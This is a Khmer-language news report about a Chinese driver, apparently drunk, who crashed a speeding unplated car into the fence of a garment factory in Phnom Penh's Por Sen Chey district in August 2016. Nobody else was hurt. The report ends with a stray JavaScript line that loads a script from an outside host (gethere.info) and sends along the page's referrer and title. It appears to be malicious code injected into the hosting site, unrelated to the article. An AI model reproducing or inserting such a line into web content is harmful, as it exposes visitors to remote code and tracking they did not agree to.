ជនជាតិចិនម្នាក់ទំនងដាក់ជ្រុលបើករថយន្តលឿនដូចហោះ ជ្រុលចង្កូតទៅបុករបងរោងចក្រ អ៊ី ហ្សិត បាក់អស់មួយផ្ទាំងធំ
ភ្នំពញ៖ បុរសជាជនជាតិចិនម្នាក់ទំនងស្រវឹងស្រាបើករថយន្តលឿនដូចហោះ ជ្រុលទៅបុករបងរោងចក្រ អ៊ី ហ្សិត International Garment Factory
បណ្តាលអោយបាក់មួយផ្ទាំងធំ តែសសំណាងល្អមិន បណ្តាលអ្នកដទៃរងរបួសឡើយ ចំណែកតៃកុងរបួសស្រាល។
ករណីគ្រោះថ្នាក់ចរាចរណ៍កើតឡើងនៅវេលាម៉ោង ០០ និង៣០នាទីយប់ថ្ងៃទី២១ ខែសីហា ឆ្នាំ ២០១៦ នៅចំនុច ភូមិព្រៃទា សង្កាត់ចោមចៅ ខណ្ឌពោធិ័សែនជ័យ រាជធានីភ្នំពេញ។
តៃកុងរថយន្តជាជនជាតិចិននោះមិនត្រូវបានគេស្គាល់ឈ្មោះឡើយ។
ប្រភពពីសន្តិសុខប្រចាំត្រង់កន្លែងកើតហេតុ បានអោយដឹងថា មុនកើតហេតុ ខណៈគាត់យាមគោលដៅ ស្រាប់តែមានរថយន្ត Foreiner អត់ស្លាកលេខមួយគ្រឿង បើកក្នុងទិសដៅពីលិចទៅកើតក្នុងល្បឿនលុះ មកដល់ចំណុចខាងលើ ជាចំនុចផ្លូវកោង យកចង្កូតមិនទាន់បានជ្រុលទៅបុករបងរោងចក្រទាំងកំរោល។
ក្រោយកើតហេតុ តំណាងជនជាតិចិន និង តំណាងខាងរោងចក្រព្យាយាមសម្របសម្រួលគ្នាដែរតែមិនត្រូវ គ្នា ក៍បានទាក់ទងទៅសមត្ថកិច្ចជួយអន្តរាគមន៍។
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;